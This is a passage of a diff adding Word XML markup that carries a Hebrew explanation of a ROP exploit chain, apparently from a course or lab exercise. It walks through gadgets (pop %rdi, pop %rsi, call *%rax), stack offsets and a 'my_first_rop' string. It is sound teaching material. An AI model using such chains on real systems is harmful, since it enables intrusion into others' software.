+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">שורה זו תכיל את הכתובת של </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rdi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> מסעיף 3. נסביר את מה שקרה משורה 7 עד לשורה זו:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>לאחר שקפצנו ל-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“push %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rbp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> יידחף הערך שלו למחסנית שעל פי שורה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>5.b.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> יהיה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>addr+13+8*2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> וידרוס ערכים שכבר לא משנים לנו.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">בפקודה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“mov %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rsp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>, %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rbp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> נזיז את הערך של </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rsp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> לתוך </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rbp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>, אבל הערך הזה כבר לא משנה לנו.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ב-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“call *%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> נשמור את הערך הנוכחי של </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rip</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> במחסנית ונקפוץ לכתובת ש-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> מכיל שהיא הכתובת של הפקודה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rsi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ב-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rsi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> נשים ב-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rsi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> את ה-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rip</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ש-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>call</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> שם במחסנית והוא לא באמת רלוונטי עבורנו.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ב-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %r15”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> נשמור את הערך ש-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rbp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> דחף למחסנית ש</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>שווה</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ל-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>addr+13+8*2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> כאשר </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>addr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> היא הכתובת שבה מתחילה המחרוזת </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>my_first_rop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> שתשמש אותנו בסופו של דבר.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">לבסוף נקפוץ לפקודה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rdi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>שורה זו מכילה את ה-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>offset</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>–(13+8*2)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> שנרצה ש-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rdi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> יכיל ובעזרת ה-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
